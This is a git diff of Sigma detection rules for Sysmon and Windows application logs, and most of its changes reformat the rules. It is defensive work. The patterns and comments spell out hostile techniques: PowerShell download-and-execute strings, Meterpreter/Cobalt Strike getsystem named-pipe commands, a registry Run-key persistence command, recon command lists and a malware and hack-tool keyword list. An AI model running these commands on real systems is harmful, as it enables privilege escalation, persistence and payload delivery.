attack.defense_evasion - attack.t1027 @@ -29,4 +29,5 @@ detection: falsepositives: - Unknown level: high + ruletype: Sigma diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml index 66969a44d..41bcf9f67 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION id: c70731dd-0097-40ff-b112-f7032f29c16c related: - - id: 175997c5-803c-4b08-8bb0-70b099f47595 - type: derived + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/03/04 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 19) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml index c2d1b32af..4ac7cf86e 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c related: - - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 - type: derived + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml index 85d81249e..8538df793 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Stdin id: 82b66143-53ee-4369-ab02-de2c70cd6352 related: - - id: 487c7524-f892-4054-b263-8a0ace63fc25 - type: derived + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived description: Detects Obfuscated Powershell via Stdin in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2023/04/23 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task28) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml index 314a9e836..ff65ca69f 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use Clip id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 related: - - id: 63e3365d-4824-42d8-8b82-e56810fefa0c - type: derived + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/04/26 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task29) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml index 2b6809639..0c76278bc 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use MSHTA id: a4e82ad2-7430-4ee8-b858-6ad6099773fa related: - - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 - type: derived + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task31) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml index 6cbdb5d34..a117ce19c 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use Rundll32 id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 related: - - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b - type: derived + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task30) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml index 8b2fafdc5..574263c3a 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d related: - - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 - type: derived + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2021/09/18 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task27) tags: - attack.defense_evasion - attack.t1027 @@ -24,7 +24,7 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - ImagePath|re: (?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c + ImagePath|re: (?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c # FPs with |\/r condition: driver_load and selection falsepositives: - Unknown diff --git a/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 11fc5d477..91620b9c8 100644 --- a/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -1,11 +1,10 @@ title: Meterpreter or Cobalt Strike Getsystem Service Installation id: d585ab5a-6a69-49a8-96e8-4a726a54de46 related: - - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 - type: derived + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived status: unsupported -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service installation +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -25,25 +24,29 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImagePath|contains|all: - - cmd - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - '%COMSPEC%' - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - cmd.exe - - /c - - echo - - \pipe\ - - ImagePath|contains|all: - - rundll32 - - .dll,a - - '/p:' + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - cmd + - /c + - echo + - \pipe\ + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - '%COMSPEC%' + - /c + - echo + - \pipe\ + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - cmd.exe + - /c + - echo + - \pipe\ + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ImagePath|contains|all: + - rundll32 + - .dll,a + - '/p:' condition: driver_load and selection fields: - ComputerName diff --git a/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml b/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml index 03c6be65a..e6ca66374 100644 --- a/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml +++ b/sigma/sysmon/unsupported/driver_load_tap_driver_installation.yml @@ -1,10 +1,9 @@ title: Tap Driver Installation id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb related: - - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 - type: derived -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunnelling techniques + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: unsupported author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 diff --git a/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml b/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml index af2ba7ab9..6ab66f58b 100644 --- a/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml +++ b/sigma/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml @@ -1,8 +1,6 @@ title: File Creation by Office Applications id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d -description: This rule will monitor executable and script file creation by office - applications. Please add more file extensions or magic bytes to the logic of your - choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -21,6 +19,7 @@ logsource: product: windows category: file_event detection: + #useful_information: Please add more file extensions and magic bytes to the logic of your choice. file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml index 8955e89bf..71aa32d30 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml @@ -28,11 +28,10 @@ detection: - \qwinsta.exe - \ipconfig.exe - \hostname.exe - CommandLine|contains: '>>' - CommandLine|endswith: temps.dat + CommandLine|contains: '>>' + CommandLine|endswith: temps.dat selection_persistence: - CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" - /v "WinNetworkSecurity" /t REG_SZ /d + CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d condition: process_creation and (selection_recon | near selection_persistence) fields: - ComputerName diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml index db9d8c80b..0eb478cbd 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml @@ -25,11 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational netCommand1: - CommandLine: net view /DOMAIN + CommandLine: net view /DOMAIN netCommand2: - CommandLine: net session + CommandLine: net session netCommand3: - CommandLine: net share + CommandLine: net share timeframe: 1m condition: process_creation and (netCommand1 | near netCommand2 and netCommand3) falsepositives: diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml index 73329bf98..165b89ed6 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml @@ -1,9 +1,7 @@ title: DNSCat2 Powershell Implementation Detection Via Process Creation id: b11d75d6-d7c1-11ea-87d0-0242ac130003 status: unsupported -description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. - Counting nslookup processes spawned by PowerShell will show hundreds or thousands - of instances if PS DNSCat2 is active locally. +description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. references: - https://github.com/lukebaggett/dnscat2-powershell - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html @@ -30,7 +28,7 @@ detection: - \powershell.exe - \pwsh.exe Image|endswith: \nslookup.exe - CommandLine|endswith: \nslookup.exe + CommandLine|endswith: \nslookup.exe condition: (process_creation and selection) | count(Image) by ParentImage > 100 fields: - Image diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml index ddda9bdd9..8b102328f 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - arp.exe - at.exe - attrib.exe @@ -63,7 +63,6 @@ detection: timeframe: 5m condition: (process_creation and selection) | count() by MachineName > 5 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: low ruletype: Sigma diff --git a/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml b/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml index 0675d91d7..073197b7e 100644 --- a/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml +++ b/sigma/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml @@ -1,8 +1,7 @@ title: Reconnaissance Activity Using BuiltIn Commands id: 2887e914-ce96-435f-8105-593937e90757 status: unsupported -description: Detects execution of a set of builtin commands often used in recon stages - by different attack groups +description: Detects execution of a set of builtin commands often used in recon stages by different attack groups references: - https://twitter.com/haroonmeer/status/939099379834658817 - https://twitter.com/c_APT_ure/status/939475433711722497 @@ -24,29 +23,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine: - - tasklist - - net time - - systeminfo - - whoami - - nbtstat - - net start - - qprocess - - nslookup - - hostname.exe - - netstat -an - - CommandLine|endswith: - - \net1 start - - \net1 user /domain - - \net1 group /domain - - \net1 group "domain admins" /domain - - \net1 group "Exchange Trusted Subsystem" /domain - - \net1 accounts /domain - - \net1 user net localgroup administrators + - CommandLine: + - tasklist + - net time + - systeminfo + - whoami + - nbtstat + - net start + - qprocess + - nslookup + - hostname.exe + - netstat -an + - CommandLine|endswith: + - \net1 start + - \net1 user /domain + - \net1 group /domain + - \net1 group "domain admins" /domain + - \net1 group "Exchange Trusted Subsystem" /domain + - \net1 accounts /domain + - \net1 user net localgroup administrators timeframe: 15s condition: (process_creation and selection) | count() by CommandLine > 4 falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index 62754e1d9..d65fdee90 100644 --- a/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/sigma/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -1,7 +1,6 @@ title: MSI Spawned Cmd and Powershell Spawned Processes id: 38cf8340-461b-4857-bf99-23a41f772b18 -description: This rule looks for Windows Installer service (msiexec.exe) spawning - command line and/or powershell that spawns other processes +description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 @@ -15,8 +14,7 @@ tags: logsource: product: windows category: process_creation - definition: Works only if Enrich Sysmon events with additional information about - process in ParentOfParentImage check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section detection: process_creation: EventID: 1 @@ -39,6 +37,6 @@ falsepositives: - Unknown level: high enrichment: - - EN_0001_cache_sysmon_event_id_1_info - - EN_0002_enrich_sysmon_event_id_1_with_parent_info + - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x + - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l ruletype: Sigma diff --git a/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml b/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml index e4867fb17..dd4684dfa 100644 --- a/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml +++ b/sigma/sysmon/unsupported/sysmon_non_priv_program_files_move.yml @@ -1,7 +1,6 @@ title: Files Dropped to Program Files by Non-Priviledged Process id: d6d9f4fb-4c1c-4f53-b306-62a22c7c61e1 -description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged - processes +description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes status: experimental author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/17 diff --git a/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index c7da4c317..af978fcf2 100644 --- a/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/sigma/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -1,7 +1,6 @@ title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing id: 8065b1b4-1778-4427-877f-6bf948b26d38 -description: Detection of child processes spawned with SYSTEM privileges by parents - with non-SYSTEM privileges and Medium integrity level +description: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level references: - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment tags: @@ -14,8 +13,7 @@ date: 2019/06/03 logsource: category: process_creation product: windows - definition: Works only if Enrich Sysmon events with additional information about - process in ParentIntegrityLevel check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section detection: process_creation: EventID: 1 @@ -28,4 +26,5 @@ detection: falsepositives: - Unknown level: high + ruletype: Sigma diff --git a/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml index 33ad78057..cb9c56b10 100644 --- a/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml +++ b/sigma/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml @@ -1,13 +1,12 @@ title: Detection of Possible Rotten Potato id: 6c5808ee-85a2-4e56-8137-72e5876a5096 -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE privileges +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ tags: - attack.privilege_escalation - - attack.t1134 + - attack.t1134 # an old one - attack.t1134.002 - sysmon status: unsupported @@ -17,8 +16,7 @@ modified: 2020/09/01 logsource: category: process_creation product: windows - definition: Works only if Enrich Sysmon events with additional information about - process in ParentUser check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section detection: process_creation: EventID: 1 @@ -30,12 +28,12 @@ detection: User: NT AUTHORITY\SYSTEM rundllexception: Image|endswith: \rundll32.exe - CommandLine|contains: DavSetCookie + CommandLine|contains: DavSetCookie condition: process_creation and (selection and not rundllexception) falsepositives: - Unknown level: high enrichment: - - EN_0001_cache_sysmon_event_id_1_info - - EN_0002_enrich_sysmon_event_id_1_with_parent_info + - EN_0001_cache_sysmon_event_id_1_info # http://bit.ly/314zc6x + - EN_0002_enrich_sysmon_event_id_1_with_parent_info # http://bit.ly/2KmSC0l ruletype: Sigma diff --git a/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml b/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml index dfc9b98b4..934911414 100644 --- a/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml +++ b/sigma/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml @@ -1,8 +1,7 @@ title: Suspicious Werfault.exe Network Connection Outbound id: e12c75f2-d09e-43f6-90e4-6a23842907af status: experimental -description: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised - systems to legitimate werfault.exe process to avoid detection. +description: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection. references: - https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ author: Sreeman @@ -43,10 +42,8 @@ detection: DestinationHostname|contains: - '*.windowsupdate.com' - '*.microsoft.com' - condition: network_connection and (selection and not ( filter1 and filter2 and - filter3 )) + condition: network_connection and (selection and not ( filter1 and filter2 and filter3 )) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces and Microsoft IP spaces + - Communication to other corporate systems that use IP addresses from public address spaces and Microsoft IP spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml b/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml index 895480e6e..8638e4fde 100644 --- a/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml +++ b/sigma/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml @@ -1,8 +1,7 @@ title: Suspicious Scripting in a WMI Consumer id: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0 status: experimental -description: Detects suspicious commands that are related to scripting/powershell - in WMI Event Consumers +description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers references: - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/ - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19 @@ -25,22 +24,22 @@ detection: - 21 Channel: Microsoft-Windows-Sysmon/Operational selection_destination: - - Destination|contains|all: - - new-object - - net.webclient - - .downloadstring - - Destination|contains|all: - - new-object - - net.webclient - - .downloadfile - - Destination|contains: - - ' iex(' - - ' -nop ' - - ' -noprofile ' - - ' -decode ' - - ' -enc ' - - WScript.Shell - - System.Security.Cryptography.FromBase64Transform + - Destination|contains|all: + - new-object + - net.webclient + - .downloadstring + - Destination|contains|all: + - new-object + - net.webclient + - .downloadfile + - Destination|contains: + - ' iex(' + - ' -nop ' + - ' -noprofile ' + - ' -decode ' + - ' -enc ' + - WScript.Shell + - System.Security.Cryptography.FromBase64Transform condition: wmi_event and selection_destination fields: - User diff --git a/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml b/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml new file mode 100644 index 000000000..0e6c0bce3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml @@ -0,0 +1,106 @@ +title: Relevant Anti-Virus Signature Keywords In Application Log +id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8 +status: test +description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords. +references: + - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31 + - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed + - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01 +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2017/02/19 +modified: 2023/11/22 +tags: + - attack.resource_development + - attack.t1588 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + keywords: + - Adfind + - ASP/BackDoor + - ATK/ + - Backdoor.ASP + - Backdoor.Cobalt + - Backdoor.JSP + - Backdoor.PHP + - Blackworm + - Brutel + - BruteR + - Chopper + - Cobalt + - COBEACON + - Cometer + - CRYPTES + - Cryptor + - Destructor + - DumpCreds + - Exploit.Script.CVE + - FastReverseProxy + - Filecoder + - GrandCrab + - HackTool + - 'HKTL:' + - HKTL. + - HKTL/ + - HTool + - IISExchgSpawnCMD + - Impacket + - JSP/BackDoor + - Keylogger + - Koadic + - Krypt + - Lazagne + - Metasploit + - Meterpreter + - MeteTool + - Mimikatz + - Mpreter + - Nighthawk + - Packed.Generic.347 + - PentestPowerShell + - Phobos + - PHP/BackDoor + - PowerSploit + - PowerSSH + - PshlSpy + - PSWTool + - PWCrack + - PWDump + - Ransom + - Rozena + - Ryzerlo + - Sbelt + - Seatbelt + - SecurityTool + - SharpDump + - Sliver + - Splinter + - Swrort + - Tescrypt + - TeslaCrypt + - Valyria + - Webshell + # - 'FRP.' + # - 'PWS.' + # - 'PWSX' + # - 'Razy' + # - 'Ryuk' + # - 'Locker' + # - 'Potato' + filter_optional_generic: + - Keygen + - Crack + - anti_ransomware_service.exe + - cyber-protect-service.exe + filter_optional_information: + Level: 4 # Information level + filter_optional_restartmanager: + Provider_Name: Microsoft-Windows-RestartManager + condition: application and (keywords and not 1 of filter_optional_*) +falsepositives: + - Some software piracy tools (key generators, cracks) are classified as hack tools +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml b/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml new file mode 100644 index 000000000..44fba0f5a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml @@ -0,0 +1,35 @@ +title: Microsoft Malware Protection Engine Crash +id: 545a5da6-f103-4919-a519-e9aec1026ee4 +related: + - id: 6c82cf5c-090d-4d57-9188-533577631108 + type: similar +status: experimental +description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine +references: + - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 + - https://technet.microsoft.com/en-us/library/security/4022344 +author: Florian Roth (Nextron Systems) +date: 2017/05/09 +modified: 2023/04/14 +tags: + - attack.defense_evasion + - attack.t1211 + - attack.t1562.001 +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: Application Error + EventID: 1000 + Data|contains|all: + - MsMpEng.exe + - mpengine.dll + condition: application and selection +falsepositives: + - MsMpEng might crash if the "C:\" partition is full +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml b/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml new file mode 100644 index 000000000..1a1ab0f85 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml @@ -0,0 +1,29 @@ +title: Potential Credential Dumping Via WER - Application +id: a18e0862-127b-43ca-be12-1a542c75c7c5 +status: test +description: Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential +references: + - https://github.com/deepinstinct/Lsass-Shtinkering + - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf + - 